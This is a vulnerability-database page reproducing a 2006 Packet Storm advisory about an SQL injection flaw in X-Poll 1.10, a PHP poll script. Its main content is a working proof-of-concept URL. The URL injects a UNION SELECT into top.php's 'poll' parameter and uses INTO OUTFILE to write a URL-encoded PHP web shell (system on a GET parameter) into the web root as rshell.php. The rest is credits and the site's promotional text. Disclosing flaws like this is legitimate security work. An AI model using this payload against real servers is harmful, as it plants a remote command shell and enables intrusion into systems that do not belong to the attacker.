Lucene search

xpoll110.txt

🗓️ 17 Aug 2006 00:00:00Reported by SirdarckcatType

packetstorm🔗 packetstormsecurity.com👁 17 Views

X-Poll 1.10 has SQL Injection vulnerabilit

`Discovered by Sirdarckcat from elhacker.net  
  
X-Poll 1.10  
http://members.lycos.co.uk/xscripts03/  
==============================================  
  
X-Poll is a simple poll maker for simple PHP  
web sites.  
  
This has a SQL Injection vulnerability.  
  
==============================================  
  
PoC:  
http://www.server.com/poll/top.php?poll=' AND 0 UNION SELECT 0,  
'%3C%3Fsystem%28%24_GET%5B%22c%22%5D%29%3B%3F%3E' , 1, 2, 3, 4, 5, 6, 7,  
8,'' INTO OUTFILE '/usr/webserver/public_htm/rshell.php  
  
==============================================  
  
Att.  
Sirdarckcat  
elhacker.net  
  
  
--   
Att.  
[email protected]  
  
http://www.google.com/search?q=sirdarckcat  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

17 Aug 2006 00:00Current

7.4High risk

Vulners AI Score7.4